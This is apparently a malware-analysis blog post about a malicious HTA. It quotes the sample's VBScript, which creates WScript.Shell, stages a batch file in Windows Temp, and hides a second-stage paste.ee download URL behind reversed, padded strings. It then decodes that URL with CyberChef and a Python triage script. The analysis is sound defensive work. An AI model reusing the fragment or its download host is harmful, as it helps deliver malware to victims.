Analysis of a Malicious HTA
Another file type attackers use is the HTA, or HTML Application. An HTA is a Windows program that uses HTML, Dynamic HTML, and scripting languages such as VBScript or JScript to build its user interface and program logic. It is executed by mshta.exe and runs with full trust, meaning the script has far more access to the system than a typical web page: there is no browser sandbox, and COM objects such as WScript.Shell are available to it. This makes HTAs useful for building standalone applications, but also attractive to malicious actors. In malware, the HTA is mostly used as a first stage that downloads the second stage, and attackers and malware developers put PowerShell code in HTAs just as they do in Office macros.
The HTA code structure is as follows:
<html>
<head>
<HTA:APPLICATION
ID="cleanApp"
APPLICATIONNAME="MyApp"
BORDER="thin"
CAPTION="yes"
SHOWINTASKBAR="yes"
SINGLEINSTANCE="yes"
WINDOWSTATE="normal"
>
<script language="VBScript">
' Your safe VBScript logic here (optional)
</script>
<script language="JavaScript">
// Your safe JavaScript logic here (optional)
</script>
</head>
</html>
As you can see, the script blocks can hold VBScript (not VBA, which is the Office macro dialect) as well as JScript/JavaScript, and both can appear in the same file.
Malware Sample : https://bazaar.abuse.ch/sample/83a02fa534ab80c2661d7ab12802abc716a7325d396ff2e8b701a45721b2b854/
Real Malicious HTA Code :
Malicious HTA Code Analysis :
<script language="VBScript">
' Goshen: a WScript.Shell COM object, which gives the script a way to run commands
Dim Goshen
Set Goshen = CreateObject("WScript.Shell")
' doglegged: path of a batch file staged in the Temp directory
Dim doglegged
doglegged = "C:\Windows\Temp\assonantal.bat"
- The malware developer declares Goshen as a WScript.Shell object so the script can interact with the shell and run commands.
- The malware developer declares doglegged as a variable holding the path C:\Windows\Temp\assonantal.bat, presumably used to execute assonantal.bat.
- The malware developer uses a reversed string plus a filler symbol (@) to obfuscate the actual destination from which the second-stage file is downloaded: Replace(StrReverse(""0@/@7@9@4@w@F@j@m@W@/@d@/@e@e@.@e@t@s@a@p@/@/@:@p@t@t@h@""), ""@"", """"). VBScript evaluates this inside out: StrReverse reverses the string, then Replace deletes every @ (the third argument is the empty string). The doubled quotes are VBScript's escape for a quote character inside a string literal, which shows the expression was lifted from inside a larger string, not written as a bare statement.
Deobfuscating the reversed string and the symbol padding:
- Copy the obfuscated string.
- Paste it into CyberChef.
- Add the Find / Replace operation.
- In the Find box type @ and leave Replace empty.
- Add the Reverse operation.
- The output is the actual destination :)
Note that CyberChef removes the @ before reversing while the script reverses first and then removes the @; the result is the same, because deleting a character commutes with reversing the string.
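The same triage can be scripted so it does not depend on clicking through CyberChef for every sample. The script below is an added example written for this post, not code from the original HTA or from the post's author: it parses the HTA skeleton shown above, flags the indicators the analysis above relies on (WScript.Shell, a .bat under Windows\Temp, PowerShell, StrReverse/Replace), and decodes Replace(StrReverse("..."), "x", "") expressions with VBScript's own evaluation order. The sample HTA is constructed from the skeleton and the quoted VBScript fragment; the obfuscated expression is assigned to a variable named dest there only so the sample is valid VBScript, because the post does not show how the real HTA consumes the expression. The regex also accepts the doubled-quote form exactly as the post quotes it.

```python
"""
Static triage of an HTA file: pull out the <script> blocks, flag the
indicators discussed in the post (WScript.Shell, a .bat dropped in Temp,
PowerShell, StrReverse/Replace string obfuscation) and decode any
Replace(StrReverse("..."), "x", "") expressions the way VBScript would.
"""
import re

# Constructed sample HTA: the skeleton from the post plus the quoted VBScript
# declarations. The obfuscated expression is assigned to `dest` only so the
# sample is valid VBScript; the post does not show how the real HTA uses it.
SAMPLE_HTA = r'''<html>
<head>
<HTA:APPLICATION ID="cleanApp" APPLICATIONNAME="MyApp" SINGLEINSTANCE="yes">
<script language="VBScript">
Dim Goshen
Set Goshen = CreateObject("WScript.Shell")
Dim doglegged
doglegged = "C:\Windows\Temp\assonantal.bat"
dest = Replace(StrReverse("0@/@7@9@4@w@F@j@m@W@/@d@/@e@e@.@e@t@s@a@p@/@/@:@p@t@t@h@"), "@", "")
</script>
</head>
</html>
'''

# The expression exactly as the post quotes it, with VBScript's doubled quotes
# (the form it takes when embedded inside a larger string literal).
EXPRESSION_AS_QUOTED = (
    'Replace(StrReverse(""0@/@7@9@4@w@F@j@m@W@/@d@/@e@e@.@e@t@s@a@p@/@/@:@p@t@t@h@""), ""@"", """")'
)

SCRIPT_BLOCK = re.compile(
    r'<script\b[^>]*language\s*=\s*"([^"]+)"[^>]*>(.*?)</script>',
    re.IGNORECASE | re.DOTALL,
)

# Indicators the analysis in the post relies on; names are this example's own.
INDICATORS = {
    "wscript_shell": re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)', re.I),
    "temp_batch_file": re.compile(r'\\Windows\\Temp\\[^"\s]+\.bat', re.I),
    "powershell": re.compile(r'\bpowershell\b', re.I),
    "string_obfuscation": re.compile(r'\bStrReverse\s*\(|\bReplace\s*\(', re.I),
}

# Replace(StrReverse("s"), "find", "repl"). Each literal may be written with a
# single quote or with doubled quotes; \1, \3 and \5 force the closing
# delimiter to match the opening one.
REPLACE_STRREVERSE = re.compile(
    r'Replace\(\s*StrReverse\(\s*("+)(.*?)\1\s*\)\s*,\s*("+)(.*?)\3\s*,\s*("+)(.*?)\5\s*\)',
    re.IGNORECASE,
)


def vbs_unescape(literal: str) -> str:
    """A doubled quote inside a VBScript string literal is one literal quote."""
    return literal.replace('""', '"')


def vbs_replace_strreverse(text: str, find: str, repl: str) -> str:
    """Evaluate in VBScript order: StrReverse first, then Replace. Replace
    defaults to vbBinaryCompare, so the match is case-sensitive."""
    return text[::-1].replace(find, repl)


def script_blocks(hta: str) -> list:
    """Return (language, body) for every <script language="..."> block."""
    return [(m.group(1), m.group(2)) for m in SCRIPT_BLOCK.finditer(hta)]


def decode_strings(source: str) -> list:
    """Decode every Replace(StrReverse(...)) expression found in source."""
    decoded = []
    for m in REPLACE_STRREVERSE.finditer(source):
        text, find, repl = (vbs_unescape(m.group(i)) for i in (2, 4, 6))
        decoded.append(vbs_replace_strreverse(text, find, repl))
    return decoded


def triage(hta: str) -> dict:
    """Summarise one HTA: script languages, indicator hits, decoded strings."""
    blocks = script_blocks(hta)
    code = "\n".join(body for _, body in blocks)
    return {
        "languages": [lang for lang, _ in blocks],
        "indicators": sorted(name for name, rx in INDICATORS.items() if rx.search(code)),
        "decoded": decode_strings(code),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_HTA))                    # decoded -> ['http://paste.ee/d/WmjFw497/0']
    print(decode_strings(EXPRESSION_AS_QUOTED))  # same URL from the doubled-quote form
```

The decoder deliberately mirrors VBScript rather than CyberChef: it reverses first and then runs the Replace, with the case-sensitive comparison VBScript uses by default, so a sample that relies on evaluation order or on case still decodes correctly. Anything the regex does not match (nested calls, Chr() concatenation, split strings) should be taken back to CyberChef or to a sandboxed run of the script.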
POC :